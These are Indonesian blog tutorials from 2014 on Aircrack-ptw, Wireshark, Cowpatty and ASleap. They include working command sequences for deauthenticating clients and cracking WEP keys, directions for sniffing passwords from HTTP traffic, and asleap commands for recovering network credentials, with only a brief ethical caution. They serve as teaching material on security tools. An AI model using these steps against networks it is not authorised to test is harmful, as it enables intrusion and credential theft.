Sabtu, 04 Januari 2014

Aircrack

Aircrack-ptw  adalah  generasi  terbaru  setelah  aircrack-ng,  dimana  aircrack-ptw membutuhkan waktu yang lebih cepat untuk mendekripsi sebuah key dari suatu akses point, tetapi aircrack-ptw ini masih memerlukan komponen-komponen dari aircrackng, yaitu : airodump-ng untuk mengcapture paket dan aireplay-ng untuk melakukan berbagai serangan jika perlu,  misalnya  untuk memaksa  target  untuk mengenerate ARP request dan lain-lain.
Contoh serangan airepla-ng :
aireplay-ng  --deauth  15  -a  00:12:17:A7:AF:E4  -c  00:0F:3D:57:FD:C0
ath0
serangan  ini  untuk  memaksa  target  untuk  mengenerate  ARP  request.
Mode serangan yang lain adalah :
- deauth count : deauthenticate 1 or all stations (-0)
- fakeauth delay : fake authentication with AP (-1)
- interactive : interactive frame selection (-2)
- arpreplay : standard ARP-request replay (-3)
- chopchop : decrypt/chopchop WEP packet (-4)
- fragment : generates valid keystream (-5)
- test : tests injection and quality (-9)

mode serangan bisa diganti dengan menggunakan kode angka.

Langkah-langka penggunaan Aircrack-ptw
1. Configurasi wireless card

$ airmon-ng stop ath0
$ iwconfig
pastikan respon sistem sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor
mode enabled)
berikan command airmon-ng start wifi0 9, untuk
menjalankan wireless card pada channel tertentu

$ airmon-ng start wifi0 9

maka sistem harus merespon
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
(monitor mode enabled)
berikan command

$ ifconfig ath0 up
 
dan pastikan sistem harus merespon sebagai berikut :
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point:
00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

2. Jalankan Airodump-ng
 
airodump-ng --channel X --write prefix_for_capture_file
interface
$ airodump-ng --channel 3 --write tes ath0

data hasil capture akan ditulis dalam file tes, oleh
airodump-ng akan disimpan dengan nama tes-01.cap

3. Jalankan aireplay (optional)
Langkah ini dilakukan jika airodump-ng tidak mendapatkan
paket yang ditangkap, maka target dapat dipaksa untuk mengenerate
ARP request
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
deuth : jenis serangan
-a : BSSID akses point
-c : Mac Address target
15 : jumlah paket yang dikirim

4. Jalankan aircrack-ptw

$ aircrack-ptw tes-01.cap









Jumat, 03 Januari 2014

Wireshark

Wireshark merupakan sebuah software yang digunakan sebagai packet analyzer. Atau bisa  disebut sebagai aplikasi yang digunakan untuk menganalisis paket data pada sebuah jaringan. Barang kali juga merupakan
salah satu analisa terbaik paket open source yang tersedia saat ini.


Tujuan penggunaan wireshark :
  • Untuk Mengidentifikasi masalah-masalah yang terdapat pada jaringan
  • Untuk membobol data orang lain
  • Untuk mempelajari protokol jaringan
  • & sebagainya.
Keunggulan Wireshark:
  • Tersedia untuk OS Linux dan Windows
  • Capture data dilakukan secara langsung dari network interface
  • Bisa Export dan Import hasil capture dari atau ke computer lain
  • Menyaring paket pada banyak kriteria
  • Pencarian untuk paket pada banyak kriteria
  • Menampilkan paket dengan informasi protokol yang sangat rinci. 

Langkah-langkah penggunaan  Wireshark;
Sebelum menjalankan aplikasi tersebut, terlebih dahulu instal aplikasi tersebut. Penginstalannya seperti software-software pada biasanya di OS Windows. setelah terinstal, buka aplikasi tersebut.


pada tanpilan tersebut ada 4 menu utama pada aplikasi ini, yaitu: Capture, Capture Help, Files, dan Online

1. Capture
Terdiri dari Interface List, Start, dan Capture Options. Interface list akan menampilkan daftar interface yang terdapat pada computer kita yang akan digunakan untuk dianalisis dalam jaringan computer. Start digunakan untuk memulai capture data. Capture Option digunakan untuk mengatur opsi-opsi dalam mengambil data dan menganalisisnya.

2. Capture Help
Terdiri dari How to Capture dan Network Media. Secara kesuluruhan kedua sub menu ini digunakan untuk memberikan informasi tentang cara penggunaan aplikasi ini.

3. Files
Terdapat sub menu Open dan Sample Captures yang digunakan untuk melihat file dari hasil capture data yang sudah tersimpan. Baik dari computer kita atau kokmputer orang lain.

4. Online
Menu ini berhubungan dengan aplikasi properties yang berhubungan dengan internet.
Cara untuk memulai analisis paket data dalam sebuah jaringan adalah dengan memilih Network Interface yang akan kita capture aktifitas datanya. Setelah itu klik start dan proses pendataan sudah terjadi seperti contoh pada gambar berikut.



Tampilan diatas terdapat beberapa list interface network. Semuanya berasal dari computer yang kita gunakan. & bisa kita gunakan sesuai kebutuhan. Sebagai contoh apabila kita akan memonitoring paket-paket data yang terjadi pada komputer kita melalui jaringan wireless kita bisa menggunakan interface wlan pada computer kita. Dari contoh diatas kita bisa menggunakan Atheros L1C PCI-E Ethernet Controller. Setelah kita pilih akan terdapat tanda centang pada interface tersebut. kemudian untuk memulainya kita bisa menekan start pada bagian bawah.



Setelah kita memulai proses monitoring pada interface jaringan tersebut maka akan muncul semua tampilan paket data yang terjadi pada komputer kita yang terhubung pada jaringan tersebut. semua jenis paket data sesuai protokolnya akan terlihat. Dengan tujuan pengiriman data yang beragam semua akan ditampilkan sesuai urutan waktu terjadinya pengiriman paket data tersebut. Terlihat keterangan waktu, alamat sumber, alamat tujuan, jenis protocol dan informasinya.

Alamat sumber disini adalah alamat ip dari komputer pengirim data dan alamat sumber merupakan alamat ip tujuan. Jenis protokolnya sebagai contoh adalah DNS, HTTP, dan TCP. 

Setiap aktifitas paket data akan terlihat secara detail. Untuk mengetesnya dapat dilakukan dengan cara ping dari alamat ip kita ke alamat ip web yang kita tuju.

Untuk mengetahui alamat ip kita dapat menggunakan command ipconfig pada command prompt, dan untuk mengetahui alamat ip tujuan dapat melakukan ping ke alamat web yang kita tuju dari cmd pula. Sebagai contoh adalah saat kita ingin mengetahui alamat ip facebook



Terlihat alamat ip www.facebook.com adalah 31.13.79.71
Dan kita bisa memfilter aktifitas data yang terjadi khusus pada alamat tujuan tersebut dengan cara ketik ‘ip.dst == 31.13.79.7’ pada kolom filter lalu klik ‘apply’ maka akan muncul tampilan paket data khusus yang terjadi pada www.facebook.com seperti berikut...


 Untuk melihat aktifitas salah satu protocol yang kita inginkan dapat dilakukan dengan mengetikkan salah satu protocol yang akan kita filter pada kolom filter. Sebagai contoh adalah protocol http pada gambar berikut.



Setiap proses data akan terlihat secara detail, misalnya saat kita melakukan ping ke alamat ip yang akan kita tuju. Proses pengiriman ping akan muncul, begitu pula reply dari alamat yang kita tuju. Begitu selanjutnya sampai proses ping tersebut selesai dilakukan. Dari setiap protocol yang digunakan oleh data-data dalam proses pengiriman mempunyai ketentuan masing-masing dalam melakukan sebuah komunikasi dan koneksi. Proses tersebut bisa kita sebut dengan handshaking. Sebagai contoh adalah proses handshaking dari protocol dhcp yang akan dijelaskan lebih lanjut dalam BAB VI pada laporan ini. proses handshakingnya antara lain adalah DHCPDISCOVER, DHCPOFFER, DHCPREQUEST, dan DHCPACK. Setiap proses tersebut akan tercapture semuanya pada software ini. Dimana proses tersebut adalah prosedur-prosedur yang digunakan oleh protocol dalam melakukan sebuah koneksi.

Dari tiap protocol juga memiliki isi paket data yang berbeda-beda, dan hal tersebut akan tampil pada detail masing-masing data yang tercapture. Apabila kita ingin melihatnya kita harus memilih salah satu paket data yang berada pada list yang tercapture. Bisa dilakukan dengan double click pada paket tersebut atau hanya sekali click yang akan tampil keterangan data yang kita pilih. Apabila kita melakukan dengan cara menekan dua kali maka detailnya akan muncul pada halaman baru yang mempunyai keuntungan kita dapat melihatnya dengan fokus.

Isi detail dari paket tersebut mewakili proses pengirman paket data berdasarkan layer-layer yang dilaluinya. Sebagai contoh apabila kita melihat pada keterangan layer network akan terlihat alamat ip tujuan dan alamat ip sumber paket tersebut. disamping itu juga terdapat keterangan heksa decimal yang akan muncul dikolom bagian bawah detail paket data itu. Pada bagian ini sering digunakan oleh pengguna software ini dalam melakukan sniffing jaringan. Sebagai contoh apabila kita ingin melihat password suatu akun pada media social atau jenis lainnya dalam internet. Kita cukup memilih jenis paket data yang menggunakan protocol http (memfilternya) kemudian melihat detail data saat proses pengiriman password. Disitu akan muncul kode kode heksa decimal yang bisa kita translasikan kedalam huruf sebagai cara untuk sniffing jaringan. Tetapi hal tersebut sebaiknya dilakukan untuk keperluan-keperluan tertentu saja yang sangan penting dan tidak digunakan untuk hal-hal yang dapat merugikan orang lain. Misalnya kita menggunakan cara tersebut hanya untuk latihan dalam menguasai software tersebut dan untuk menguji coba keunggulan keunggulan dari tiap tools software wireshark.

Secara keseluruhan software ini sangat cocok bagi para administrator jaringan atau orang yang bergelut dalam dunia jaringan komputer dalam memonitoring sebuah jaringan komputer.

Rabu, 01 Januari 2014

Cowpatty & ASleap

Cowpatty
 
Cowpatty merupakan sebuah software yang bisa digunakan untuk crack keamanan wifi/ untuk cracking WPA-PSK.  Software ini bukan hanya untuk melakukan cracking wifi melainkan juga untuk meningkatkan keamanan router nirkabel.



ASleap

Asleap adalah sebuah software yang bisa digunakan untuk caracking VPN. Software ini biasanya lebih kompatibel jika digunakan dengan sistem operasi Backtrack, karena memang Backtrack sudah menggunakan Asleap sebagai software bawaannya.

Fungsi utama dari ASleap adalah untuk mencari sebuah username dan pasword yang sedang aktif dan berada dalam satu jaringan dengan komputer yang kita gunakan. Cara menggunakan ASleap tidak jauh beda dengan tools tools yang saya posting sebelumnya. Jadi kita hanya cukup menjalankan ASleap dari terminal Backtrack kemudian kita hanya mengikuti perintah atau memilih langkah apa yang akan dikerjakan oleh software tersebut. Sebagai contoh sederhana saya akan menjelaskan penggunaan ASleap

Cara menggunakan ASleap :
- Buka progarm tersebut, sehingga muncul tampilan seperti dibawah ini,




-  Selanjutnya ketikkan perintah
./genkeys  -r  dict  -f  dict.dat  -n  dict.idx
 maka akan muncul tampilan seperti dibawah.



- Kemudian ketikkan;
./asleap  -r  data/leap.dump  -f  dict.dat  -n  dict.idx

maka akan segera muncul user name & pasword yang sedang aktif, seperti gambar dibawah ini; 



Selamat Mencoba !